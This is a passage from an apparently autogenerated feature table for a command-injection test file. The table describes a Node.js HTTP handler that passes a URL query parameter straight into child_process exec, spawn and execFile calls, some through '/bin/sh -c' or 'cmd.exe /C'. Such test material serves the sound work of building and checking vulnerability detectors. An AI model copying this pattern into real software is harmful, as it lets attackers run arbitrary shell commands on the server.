autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:8:9:15 | execSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:8:9:15 | execSync | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:17:9:21 | "foo" | CalleeFlexibleAccessPath | cp.execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:17:9:21 | "foo" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:17:9:21 | "foo" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:17:9:21 | "foo" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:17:9:21 | "foo" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:17:9:21 | "foo" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:17:9:21 | "foo" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:17:9:21 | "foo" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:9:17:9:21 | "foo" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:15 | cp.execFile | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:15 | cp.execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:15 | cp.execFile | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:15 | cp.execFile | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:15 | cp.execFile | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:22 | cp.execFile("foo") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:22 | cp.execFile("foo") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:22 | cp.execFile("foo") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:22 | cp.execFile("foo") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:22 | cp.execFile("foo") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:22 | exceptional return of cp.execFile("foo") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:22 | exceptional return of cp.execFile("foo") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:22 | exceptional return of cp.execFile("foo") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:22 | exceptional return of cp.execFile("foo") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:5:10:22 | exceptional return of cp.execFile("foo") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:8:10:15 | execFile | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:8:10:15 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:8:10:15 | execFile | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:8:10:15 | execFile | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:8:10:15 | execFile | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:17:10:21 | "foo" | CalleeFlexibleAccessPath | cp.execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:17:10:21 | "foo" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:17:10:21 | "foo" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:17:10:21 | "foo" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:17:10:21 | "foo" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:17:10:21 | "foo" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:17:10:21 | "foo" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:17:10:21 | "foo" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:10:17:10:21 | "foo" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:19 | cp.execFileSync | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:19 | cp.execFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:19 | cp.execFileSync | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:19 | cp.execFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:19 | cp.execFileSync | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:26 | cp.exec ... ("foo") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:26 | cp.exec ... ("foo") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:26 | cp.exec ... ("foo") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:26 | cp.exec ... ("foo") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:26 | cp.exec ... ("foo") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:26 | exceptional return of cp.exec ... ("foo") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:26 | exceptional return of cp.exec ... ("foo") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:26 | exceptional return of cp.exec ... ("foo") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:26 | exceptional return of cp.exec ... ("foo") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:5:11:26 | exceptional return of cp.exec ... ("foo") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:8:11:19 | execFileSync | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:8:11:19 | execFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:8:11:19 | execFileSync | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:8:11:19 | execFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:8:11:19 | execFileSync | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:21:11:25 | "foo" | CalleeFlexibleAccessPath | cp.execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:21:11:25 | "foo" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:21:11:25 | "foo" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:21:11:25 | "foo" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:21:11:25 | "foo" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:21:11:25 | "foo" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:21:11:25 | "foo" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:21:11:25 | "foo" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:11:21:11:25 | "foo" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:12 | cp.spawn | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:12 | cp.spawn | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:12 | cp.spawn | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:12 | cp.spawn | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:12 | cp.spawn | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:19 | cp.spawn("foo") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:19 | cp.spawn("foo") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:19 | cp.spawn("foo") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:19 | cp.spawn("foo") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:19 | cp.spawn("foo") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:19 | exceptional return of cp.spawn("foo") | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:19 | exceptional return of cp.spawn("foo") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:19 | exceptional return of cp.spawn("foo") | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:19 | exceptional return of cp.spawn("foo") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:5:12:19 | exceptional return of cp.spawn("foo") | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:8:12:12 | spawn | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:8:12:12 | spawn | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:12:8:12:12 | spawn | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh 